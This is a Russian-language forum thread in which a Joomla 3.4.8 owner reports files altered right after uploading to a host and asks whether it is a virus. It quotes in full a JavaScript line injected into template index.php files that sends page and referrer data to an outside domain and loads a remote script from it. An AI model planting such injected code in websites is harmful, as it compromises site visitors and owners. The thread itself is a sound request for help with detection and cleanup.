Ситуация такая, создал чистый файл на локалхосте джумла 3.4.8, перенёс на хостинг в инете и запустил сайт всего лишь один раз, без входа в админскую панель, проверить работает или нет... Потом сделал программой chfiles.php список файлов и стал их сличать с оригиналом откуда залил, понятно конфигурайшен, htaccess, я пропустил тут без вопросов... но вот в файлах на хостнге TEMPLATES\PROTOSTAR\INDEX.PHP TEMPLATES\BEEZ3\INDEX.PHP появилась новая строчка Spoiler: новая строчка <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://dimchap.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script> Это так и должно быть или это уже вирус появился? Ещё как-то не могу понять файл \libraries\phputf8\README на локале размер 3370, на хостинге 3288, начал сличать тексты (утилита beyond compare), не видит эта утилита различий, как увидеть этот скрытый текст... В общем ещё файлов 5 изменили размерна хостинге. всех их приводить не буду... но это нормально или это вирус.. на сайте ничего не установлено, голая джумла и уже столько расхождений...
Это внешний вирус или внутри хостинга где-то?, и ещё как проверить расхождения файлов. где размер не совпадает а все строчки одинаковые?(отличаются на 1-2 байта) PS: на локальном компе доктор ВЭБ, и в общем-то каждый день проверяет, т.е. комп чистый...
Спасибо, но утилита beyond compare, очень мощная, ею 1с ники пользуются для сравнения конфиг., тут нужен редактор который сравнивает в hex кодах, так как я рассмотрел эти два текста(в которых есть различия в размерах, но нет различия в строках) в WORD с параметром "показать все символы", они отличаются скрытыми символами (перевод строки, таб и т.д.), видать это какие-то флаги в алгоритме этих вирусов... На хостинге 2 сайта, оригинал джумлы(который я сделал для сравнения, лакмусовая бумажка есть вирусы на хостинге или нет...), и то что мне передали J3.4.8 вести, в общем спасибо за ответы, буду сейчас вычищать сайты айболитом...
